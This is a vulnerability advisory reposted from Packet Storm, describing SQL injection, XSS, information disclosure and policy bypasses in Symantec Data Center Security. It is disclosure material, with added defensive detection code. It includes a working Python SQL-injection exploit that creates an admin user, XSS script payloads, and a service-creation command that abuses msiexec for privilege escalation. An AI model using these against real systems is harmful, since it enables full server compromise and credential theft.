Packet Storm ID: PACKETSTORM:130060 (published Jan 22, 2015)

Symantec SDCS:SA / SCSP XSS / Bypass / SQL Injection / Disclosure

2015-01-22 00:00:00
Stefan Viehbock
packetstormsecurity.com
EPSS: 0.006 (Low), percentile 77.9%

`SEC Consult Vulnerability Lab Security Advisory < 20150122-0 >  
=======================================================================  
title: Multiple critical vulnerabilities  
products: Symantec Data Center Security: Server Advanced (SDCS:SA)  
Symantec Critical System Protection (SCSP)  
vulnerable version: see: Vulnerable / tested versions  
fixed version: SCSP 5.2.9 MP6, SDCS:SA 6.0 MP1 - not all  
vulnerabilities were fixed, but mitigations exist  
impact: Critical  
CVE number: CVE-2014-7289, CVE-2014-9224, CVE-2014-9225, CVE-2014-9226  
homepage: http://www.symantec.com  
found: 2014-09-19  
by: Stefan Viehböck  
SEC Consult Vulnerability Lab  
https://www.sec-consult.com  
=======================================================================  
  
Vendor description:  
-------------------  
"Symantec Data Center Security: Server Advanced v6.0 (DCS: Server Advanced)  
extends the Data Center Security: Server solution beyond agentless threat  
protections by incorporating technologies previously known as Critical System  
Protection. Data Center Security: Server Advanced provides granular, policy-  
based controls with a low impact in-guest agent to monitor and protect numerous  
physical and virtual server environments. Through a combination of technologies  
including application-centric controls including protected white listing,  
sandboxing using least privilege access controls, host-based intrusion detection  
(HIDS) and prevention (HIPS), and real-time file integrity monitoring (FIM),  
organizations can proactively safeguard their heterogeneous server environments  
and the information they contain from zero-day and targeted attacks, and fulfill  
their compliance mandates across critical systems. Click here for more info"  
  
Source:  
http://www.symantec.com/connect/forums/announcing-data-center-security-server-server-advanced-products  
  
  
Business recommendation:  
------------------------  
Attackers are able to completely compromise the SDCS:SA Server as they can gain  
access at the system and database level. Furthermore attackers can manage all  
clients and their policies.  
  
SDCS:SA Server can be used as an entry point into the target infrastructure  
(lateral movement, privilege escalation).  
  
Furthermore the SDCS:SA Client protections can be bypassed in several ways.  
  
It is highly recommended by SEC Consult not to use this software until a  
thorough security review (SDCS:SA Server, SDCS:SA Client Policies) has been  
performed by security professionals and all identified issues have been  
resolved.  
  
Note: SCSP was succeeded by SDCS:SA (SDCS:SA 6.0 is the follow-on product to  
SCSP 5.2.9). In this document the name SDCS:SA is used for both.  
  
  
Vulnerability overview/description:  
-----------------------------------  
1) Unauthenticated SQL Injection (SDCS:SA Server) (CVE-2014-7289)  
Due to insufficient input validation, the application allows the injection  
of direct SQL commands. By exploiting the vulnerability, an attacker gains  
access (read/write) to all records stored in the database as arbitrary SQL  
statements can be executed.  
  
Furthermore the application design enables an attacker to gain code execution  
as SYSTEM (highest privilege Windows user) on the server by exploiting this  
vulnerability.  
  
No prior authentication is needed to exploit this vulnerability.  
  
Affected script:  
https://<host>:4443/sis-ui/authenticate  
  
  
2) Reflected Cross-Site-Scripting (XSS) (SDCS:SA Server) (CVE-2014-9224)  
The application suffers from a reflected cross-site scripting vulnerability,  
which allows an attacker to steal other users' sessions, to impersonate other  
users and to gain unauthorized access to the admin interface.  
  
Affected scripts:  
https://<host>:8081/webui/Khaki_docs/SSO-Error.jsp  
https://<host>:8081/webui/admin/WCUnsupportedClass.jsp  
  
  
3) Information Disclosure (SDCS:SA Server) (CVE-2014-9225)  
A script discloses internal information about the application and the server  
without prior authentication. This information includes file paths on the  
webserver and version information (OS, Java).  
  
Affected script:  
https://<host>:8081/webui/admin/environment.jsp  
  
  
4) Multiple Default Security Protection Policy Bypasses (SDCS:SA Client)  
(CVE-2014-9226)  
Several bypasses were discovered. These require Windows Administrator  
permissions. This requirement is usually met in SDCS:SA deployments.  
  
Note: SEC Consult did not check whether the mitigations provided by Symantec do  
in fact sufficiently mitigate these vulnerabilities!  
  
- Persistent code execution via Windows Services  
The default Symantec policy rules can be bypassed in order to get persistent  
arbitrary code execution.  
  
- Remote code execution via RPC  
The default Symantec policy rules can be bypassed in order to get arbitrary  
code execution on a remote system. In addition, "psexec-style" remote code  
execution via SMB is possible as well.  
  
- Policy bypass: Extraction of Windows passwords/hashes  
The default Symantec policy rules do not prevent attackers from extracting  
the Windows passwords/password hashes from the System.  
  
- Privilege elevation via Windows Installer (msiexec.exe)  
The restrictions imposed by the default policies can be bypassed entirely by  
exploiting incorrect assumptions made in the policy regarding the Windows  
Installer (msiexec.exe).  
  
- Privilege elevation/code execution via Windows Management Instrumentation  
(.mof files)  
The restrictions imposed by default policies can be bypassed partially by  
exploiting incorrect assumptions made in the policy regarding the Windows  
Management Instrumentation. The policy does not take intended OS functionality  
to execute code into account.  
  
Proof of concept:  
-----------------  
1) Unauthenticated SQL Injection (SDCS:SA Server) (CVE-2014-7289)  
The servlet accessible via /sis-ui/authenticate (TCP port 4443, HTTPS) is  
vulnerable to SQL injection. By sending a specially crafted HTTP request,  
arbitrary SQL statements can be executed.  
In a proof of concept exploit, SQL statements to add a new SDCS:SA user with  
admin privileges (username: secconsult, password: PASSWORD123!) were executed.  
These statements are:  
  
INSERT INTO USR (RID, USERNAME, PWD, CONTACT_NAME, PHONES, EMAIL, ALERT_EMAIL,  
ADDRESS, MANAGER_NAME, BUSINESS_INFO, PREF_LANGUAGE, FLAGS, DESCR, CREATETIME,  
MODTIME, ENABLED, BUILTIN, HIDDEN, SALT) VALUES (1504, 'secconsult',  
'DUjDkNZgv9ys9/Sj/FQwYmP29JBtGy6ZvuZn2kAZxXc=',  
'', '', '', '', '', '', '', '', NULL, 'SECCONSULT', '2014-09-12 07:13:09',  
'2014-09-12 07:13:23', '1', '0', '0',  
'N1DSNcDdDb89eCIURLriEO2L/RwZXlRuWxyQ5pyGR/tfWt8wIrhSOipth8Fd/KWdsGierOx809rICjqrhiNqPGYTFyZ1Kuq32sNKcH4wxx+AGAUaWCtdII7ZXjOQafDaObASud25867mmEuxIa03cezJ0GC3AnwVNOErhqwTtto=');  
INSERT INTO ROLEMAP (USERRID, ROLERID) VALUES (1504, 1);  
  
The code used to exploit the SQL injection vulnerability is listed below:  
  
import http.client   # Python 3 replacement for the original httplib
import ssl

def send_request(host, data):
    # The servlet expects its own "AppFire" framing: a UTF-16LE "properties"
    # body announced by the custom headers below.
    headers = {"AppFire-Format-Version": "1.0",
               "AppFire-Charset": "UTF-16LE",
               "Content-Type": "application/x-appfire",
               "User-Agent": "Java/1.7.0_45"}
    # The appliance uses a self-signed certificate; skip verification.
    conn = http.client.HTTPSConnection(host, context=ssl._create_unverified_context())
    conn.request("POST", "/sis-ui/authenticate", data, headers)
    response = conn.getresponse()
    body = response.read()
    conn.close()
    return response, body

header = "Data-Format=text/plain\nData-Type=properties\nData-Length=%i\n\n"

# The "un" (username) property is concatenated into a SQL statement by the
# server; the injected INSERT adds the user "secconsult" to the USR table.
data = ("ai=2\r\nha=example.com\r\nun=AAAAAAAAAAAAAA'; INSERT INTO USR (RID, USERNAME, "
        "PWD, CONTACT_NAME, PHONES, EMAIL, ALERT_EMAIL, ADDRESS, MANAGER_NAME, BUSINESS_INFO, "
        "PREF_LANGUAGE, FLAGS, DESCR, CREATETIME, MODTIME, ENABLED, BUILTIN, HIDDEN, SALT) "
        "VALUES (1504, 'secconsult', 'DUjDkNZgv9ys9/Sj/FQwYmP29JBtGy6ZvuZn2kAZxXc=', '', '', "
        "'', '', '', '', '', '', NULL, 'SV DESCRIPTION', '2014-09-12 07:13:09', '2014-09-12 "
        "07:13:23', '1', '0', '0', "
        "'N1DSNcDdDb89eCIURLriEO2L/RwZXlRuWxyQ5pyGR/tfWt8wIrhSOipth8Fd/KWdsGierOx809rICjqrhiNqPGYTFyZ1Kuq32sNKcH4wxx+AGAUaWCtdII7ZXjOQafDaObASud25867mmEuxIa03cezJ0GC3AnwVNOErhqwTtto='); "
        "-- '' ")  # add user to USR table
# Second request: map the new user (RID 1504) to the admin role (RID 1).
#data = ("ai=2\r\nha=example.com\r\nun=AAAAAAAAAAAAAA'; INSERT INTO ROLEMAP (USERRID, "
#        "ROLERID) VALUES (1504, 1); -- ")  # add user to admin group
data += ("\r\nan=Symantec Data Center Security Server 6.0\r\npwd=GBgYGBgYGBgYGBgYGBgYGBg="
         "\r\nav=6.0.0.380\r\nhn=WIN-3EJQK7U0S3R\r\nsso=\r\n")
data = data.encode('utf-16le')

eof_flag = b"\nEOF_FLAG\n"
header = (header % len(data)).encode('ascii')   # Data-Length counts the UTF-16LE body bytes
payload = header + data + eof_flag

response, body = send_request("<host>:4443", payload)

print(body.decode('utf-16le'))
print(response.status)
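The exploit above works because the servlet splices the "un" property of the AppFire message straight into SQL. The following is an added example, not SEC Consult's PoC and not Symantec's code: it builds and parses the "application/x-appfire" framing the same way the PoC does (ASCII header with Data-Length, UTF-16LE key=value body, EOF_FLAG trailer) and then applies the kind of check a WAF or the servlet itself could run on the parsed fields before anything reaches the database. The field set, the single-quote/keyword heuristic and the two sample logins are this example's own assumptions.

```python
"""Build/parse the x-appfire authentication message and flag SQL injection
in its fields. Added example; field names and framing follow the PoC above,
the detection heuristic and sample data are assumptions of this example."""

import re

EOF_FLAG = b"\nEOF_FLAG\n"
HEADER_FMT = "Data-Format=text/plain\nData-Type=properties\nData-Length=%i\n\n"


def build_appfire_message(fields):
    """Serialise key/value pairs as the PoC does: CRLF-separated key=value
    lines, UTF-16LE encoded, framed by an ASCII header that carries the
    body length in bytes and followed by the EOF_FLAG trailer."""
    body = "".join("%s=%s\r\n" % (k, v) for k, v in fields.items()).encode("utf-16le")
    header = (HEADER_FMT % len(body)).encode("ascii")
    return header + body + EOF_FLAG


def parse_appfire_message(raw):
    """Inverse of build_appfire_message: returns (header_dict, field_dict).
    Raises ValueError when Data-Length and the body/trailer disagree, which
    is the first sanity check a server-side filter should make."""
    head, sep, rest = raw.partition(b"\n\n")
    if not sep:
        raise ValueError("no header terminator")
    header = dict(line.split("=", 1) for line in head.decode("ascii").split("\n"))
    length = int(header["Data-Length"])
    body, trailer = rest[:length], rest[length:]
    if trailer != EOF_FLAG:
        raise ValueError("Data-Length does not match body or EOF_FLAG missing")
    fields = {}
    for line in body.decode("utf-16le").split("\r\n"):
        if line:
            k, _, v = line.partition("=")   # values such as base64 may contain '='
            fields[k] = v
    return header, fields


# Heuristic (assumption of this example): quotes, statement separators,
# comment markers or DML keywords have no business in a login property.
SQLI_PATTERN = re.compile(r"'|;|--|/\*|\b(insert|update|delete|union|select)\b", re.I)


def suspicious_fields(fields):
    """Return the sorted names of fields whose value matches SQLI_PATTERN."""
    return sorted(k for k, v in fields.items() if SQLI_PATTERN.search(v))


# Constructed samples: a benign login and the PoC's injected username.
BENIGN = {"ai": "2", "ha": "example.com", "un": "operator",
          "pwd": "GBgYGBgYGBgYGBgYGBgYGBg=", "av": "6.0.0.380"}
INJECTED = dict(BENIGN, un="AAAAAAAAAAAAAA'; INSERT INTO ROLEMAP (USERRID, ROLERID) "
                           "VALUES (1504, 1); -- ")


def demo():
    """Round-trip both samples through the framing and report flagged fields."""
    results = {}
    for name, fields in (("benign", BENIGN), ("injected", INJECTED)):
        raw = build_appfire_message(fields)
        _header, parsed = parse_appfire_message(raw)
        assert parsed == fields          # framing round-trips losslessly
        results[name] = suspicious_fields(parsed)
    return results


if __name__ == "__main__":
    print(demo())
```

Note that the check runs on the decoded field values, after the UTF-16LE body has been parsed; matching on the raw request bytes would miss the quote entirely because it is encoded as the two bytes 27 00.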
  
  
As the application users also act as Tomcat administrators, an attacker can  
log in to the Tomcat manager as well. The Tomcat manager is available by  
default via TCP port 8081 (HTTPS).  
The Tomcat Web Application Manager can be used to deploy new .war files  
containing attacker-controlled Java code. This allows an attacker to execute  
arbitrary commands on the operating system with the permissions of the account  
running the "Symantec Data Center Security Server Manager" service  
(SISManager), which is SYSTEM.  
  
  
2) Reflected Cross-Site-Scripting (XSS) (SDCS:SA Server) (CVE-2014-9224)  
At least the following URLs are vulnerable to XSS:  
https://example.com:8081/webui/Khaki_docs/SSO-Error.jsp?ErrorMsg=<script>alert('xss')</script>  
https://example.com:8081/webui/admin/WCUnsupportedClass.jsp?classname=<script>alert('xss')</script>  
  
  
3) Information Disclosure (SDCS:SA Server) (CVE-2014-9225)  
The following URL discloses internal information:  
https://example.com:8081/webui/admin/environment.jsp  
  
  
4) Multiple Default Security Protection Policy Bypasses (SDCS:SA Client)  
(CVE-2014-9226)  
- Persistent code execution via Windows Services  
Windows Service binaries can have file extensions other than ".exe". This  
allows an attacker to execute arbitrary files and enables automatic execution  
of malicious code at OS boot.  
  
- Remote code execution via RPC  
Existing tools like "psexec" or Metasploit (exploit/windows/smb/psexec) can  
be modified to write the service binary to the target system under a file name  
not ending in ".exe".  
  
- Policy bypass: Extraction of Windows passwords/hashes  
The tool "mimikatz" can be used to extract Windows credentials.  
  
- Privilege elevation via Windows Installer (msiexec.exe)  
msiexec.exe is granted "safe privileges" when it is started as a service  
(normally by the "Windows Installer" service, which starts it with the  
parameter "/V"). This can be abused by creating a service that starts  
msiexec.exe with the parameters "/quiet", "/i" and the path to a valid .msi  
file. Upon service start the .msi file is executed with "safe privileges" and  
is not subject to any SDCS:SA Client checks.  
  
sc create evil_service binpath= "c:\windows\System32\msiexec.exe /quiet /i c:\temp\evil_msi" type= own start= auto error= ignore  
net start evil_service  
  
- Privilege elevation/code execution via Windows Management Instrumentation  
(.mof files)  
On older Windows versions, .mof files placed in "%SystemRoot%\System32\wbem\mof\"  
are compiled and executed automatically, which triggers arbitrary code  
execution. The code runs with "def_winsvcs_ps" permissions.  
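Three of the bypasses above (service images without an ".exe" extension, psexec-style drops under another extension, and msiexec.exe started as a service with "/i") share one observable: an unusual service ImagePath. The following is an added example, not part of the SEC Consult advisory and not a Symantec policy, that audits a list of service command lines for exactly those patterns. The sample services, their names and paths are constructed for the example; on a real host the same functions can be fed the ImagePath values from "sc qc <name>" or from HKLM\SYSTEM\CurrentControlSet\Services.

```python
"""Hunt for service definitions matching the SDCS:SA default-policy bypasses.
Added example; sample data is constructed, the rules are this example's
reading of the advisory, not Symantec's policy logic."""

import ntpath
import re


def split_image_path(image_path):
    """Split a service ImagePath into (executable, argument string).
    A quoted path ends at the closing quote; an unquoted path is cut at the
    first space, which is also how the service controller treats it."""
    s = image_path.strip()
    if s.startswith('"'):
        end = s.find('"', 1)
        if end == -1:
            return s[1:], ""
        return s[1:end], s[end + 1:].strip()
    exe, _, args = s.partition(" ")
    return exe, args.strip()


def classify_service(name, image_path):
    """Return a list of finding strings for one service (empty = nothing odd)."""
    exe, args = split_image_path(image_path)
    base = ntpath.basename(exe).lower()
    ext = ntpath.splitext(base)[1]
    findings = []
    # Bypasses 1 and 2: a service image that is not a .exe evades policy rules
    # keyed on the ".exe" extension (and persists across reboots if start=auto).
    if ext != ".exe":
        findings.append("non-exe service image: %s" % exe)
    # Bypass 4: msiexec.exe run as a service with /i installs an attacker-
    # chosen package under the "safe privileges" the policy grants it.
    if base == "msiexec.exe" and re.search(r"(^|\s)/i(\s|$)", args, re.I):
        findings.append("msiexec.exe installing a package from service context: %s" % args)
    # Not a bypass on its own, but a service image in a user-writable
    # location is where the dropped files from the PoCs would live.
    if re.match(r"^[a-z]:\\(temp|users|programdata)\\", exe, re.I):
        findings.append("image in user-writable path: %s" % exe)
    return findings


def audit(services):
    """services: iterable of (name, image_path). Returns {name: findings}
    for every service with at least one finding."""
    report = {}
    for name, image_path in services:
        findings = classify_service(name, image_path)
        if findings:
            report[name] = findings
    return report


# Constructed sample modelled on the PoCs above (hypothetical hosts, not real data).
SAMPLE_SERVICES = [
    ("Spooler", r"C:\Windows\System32\spoolsv.exe"),
    ("ExampleAgent", r'"C:\Program Files\Example\agent.exe" -service'),
    ("evil_service", r"c:\windows\System32\msiexec.exe /quiet /i c:\temp\evil_msi"),
    ("updater", r'"C:\ProgramData\updater\svc.dat" -run'),
]

if __name__ == "__main__":
    for name, findings in audit(SAMPLE_SERVICES).items():
        print(name, "->", "; ".join(findings))
```

The extension check is deliberately naive because the bypass is naive: the policy keyed on ".exe" and the attacker simply renamed the file. The .mof drop (bypass 5) is not a service and is better caught by watching writes to %SystemRoot%\System32\wbem\mof\ with file integrity monitoring.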
  
  
Vulnerable / tested versions:  
-----------------------------  
The vulnerabilities have been verified to exist in Symantec Data Center  
Security: Server Advanced version 6.0, which was the most recent version at  
the time of discovery.  
However other versions (SCSP 5.2.9) are affected by the vulnerabilities as  
well. See the vendor information in the Solution section.  
  
  
  
Vendor contact timeline:  
------------------------  
2014-10-20: Sending advisory and proof of concept exploit via encrypted  
channel.  
2014-10-20: Vendor acknowledges receipt of advisory.  
2014-11-18: Requesting status update.  
2014-11-18: Vendor responds and informs about an advisory in December,  
version containing fixes in February.  
2014-12-04: Vendor informs about delays in releasing fixes/mitigations,  
target release date mid-January.  
2015-01-08: Vendor confirms release date for fixes/mitigations (2015-01-17).  
2015-01-17: Vendor releases fixes for SCSP.  
2015-01-19: Vendor releases advisory and mitigations for SCSP/SDCS:SA.  
2015-01-22: SEC Consult releases coordinated security advisory.  
  
  
  
Solution:  
---------  
Update to the most recent version of SCSP (5.2.9 MP6) or SDCS:SA (6.0 MP1).  
  
Not all vulnerabilities are fixed by this update! For the remaining issues  
Symantec has provided mitigations.  
  
More information can be found at:  
http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=&suid=20150119_00  
  
http://www.symantec.com/business/support/index?page=content&id=TECH227679  
http://www.symantec.com/business/support/index?page=content&id=HOWTO100996&actp=search&viewlocale=en_US&searchid=1421349750071  
  
  
Workaround:  
-----------  
See solution.  
  
  
Advisory URL:  
-------------  
https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm  
  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
SEC Consult Vulnerability Lab  
  
SEC Consult  
Vienna - Bangkok - Frankfurt/Main - Montreal - Singapore - Vilnius - Zurich  
  
Headquarter:  
Mooslackengasse 17, 1190 Vienna, Austria  
Phone: +43 1 8903043 0  
Fax: +43 1 8903043 15  
  
Mail: research at sec-consult dot com  
Web: https://www.sec-consult.com  
Blog: http://blog.sec-consult.com  
Twitter: https://twitter.com/sec_consult  
  
Interested to work with the experts of SEC Consult?  
Write to [email protected]  
  
EOF Stefan Viehböck / @2015  
  
`
